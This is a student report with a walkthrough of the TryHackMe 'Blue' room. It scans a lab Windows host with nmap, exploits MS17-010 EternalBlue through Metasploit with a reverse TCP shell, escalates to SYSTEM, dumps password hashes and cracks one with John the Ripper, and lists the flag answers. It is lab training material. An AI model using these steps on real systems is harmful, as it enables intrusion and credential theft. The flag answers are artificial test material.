---
Title: SWS101 report4
categories: [SWS101, report4]
tags: [SWS101]
---

# TryHackMe - Blue
Deploy & hack into a Windows machine, leveraging common misconfigurations issues.

## Task 1: Recon
Scan the Machine:
Utilize Nmap to scan all ports for service enumeration.

    sudo nmap -sS -sV -T4 -p- 10.10.203.99 -vv
Result: 3 ports under 1000 are open: 135, 139, and 445.

Identify Vulnerability:
Run Nmap script scanning to identify vulnerabilities.

    sudo nmap -sS -sV -T4 --script=vuln -p 135,139,445 10.10.203.99 -vv
Result: The machine is vulnerable to "ms17-010" exploit targeting SMB service.

## Task 2: Gain Access
Start Metasploit:
Launch Metasploit to utilize its modules for exploitation.

    msfconsole
Find Exploitation Code:
Search for the exploit code targeting the identified vulnerability.

    search ms17-010
Result: Exploit path: exploit/windows/smb/ms17_010_eternalblue

Set Required Value:
Set the RHOSTS (Target IP) parameter.

    set RHOSTS 10.10.136.254

Set Payload:
Set the payload for the exploit.

    set payload windows/x64/shell/reverse_tcp
Run Exploit:
Execute the exploit to gain access to the target.

    exploit/run

## Task 3: Escalation
Convert to Meterpreter Shell:
Background the current shell and research the conversion process.

    CTRL + Z
Identify Post Module:
Search for the post module to convert shell to Meterpreter.

    search post/multi/manage/shell_to_meterpreter
Set Required Options:
Set the LHOST (Attacker's IP) and SESSION parameters.

    set LHOST <attacker_ip>
    set SESSION <session_number>
Run Module:
Execute the module to convert shell to Meterpreter.

run
Verify Privilege Escalation:
Check if escalated to NT AUTHORITY\SYSTEM.

    getsystem
Migrate Process:
Migrate to a process running as NT AUTHORITY\SYSTEM.

    ps
    migrate <process_id>

## Task 4: Cracking
Dump Password Hashes:
Dump password hashes using Meterpreter shell.

    hashdump
Crack Password Hash:
Save the hash and crack it using John the Ripper.

    echo "Jon:1000:aad3b435b51404eeaad3b435b51404ee:ffb43f0de35be4d9917ac0cc8ad57f8d:::" > windowshash
    john --format=NT windowshash --wordlist=/usr/share/wordlists/rockyou.txt

## Task 5: Find Flags
Flag 1:
Locate the flag at the system root.

    C:\flag{access_the_machine}
flag{access_the_machine}

Flag 2:
Find the flag where passwords are stored within Windows.

    C:\Windows\System32\config\flag{sam_database_elevated_access}
flag{sam_database_elevated_access}

Flag 3:
Search for the flag in an excellent location to loot.

    C:\Windows\Users\<username>\flag{admin_documents_can_be_valuable}
flag{admin_documents_can_be_valuable}

Happy Hacking;>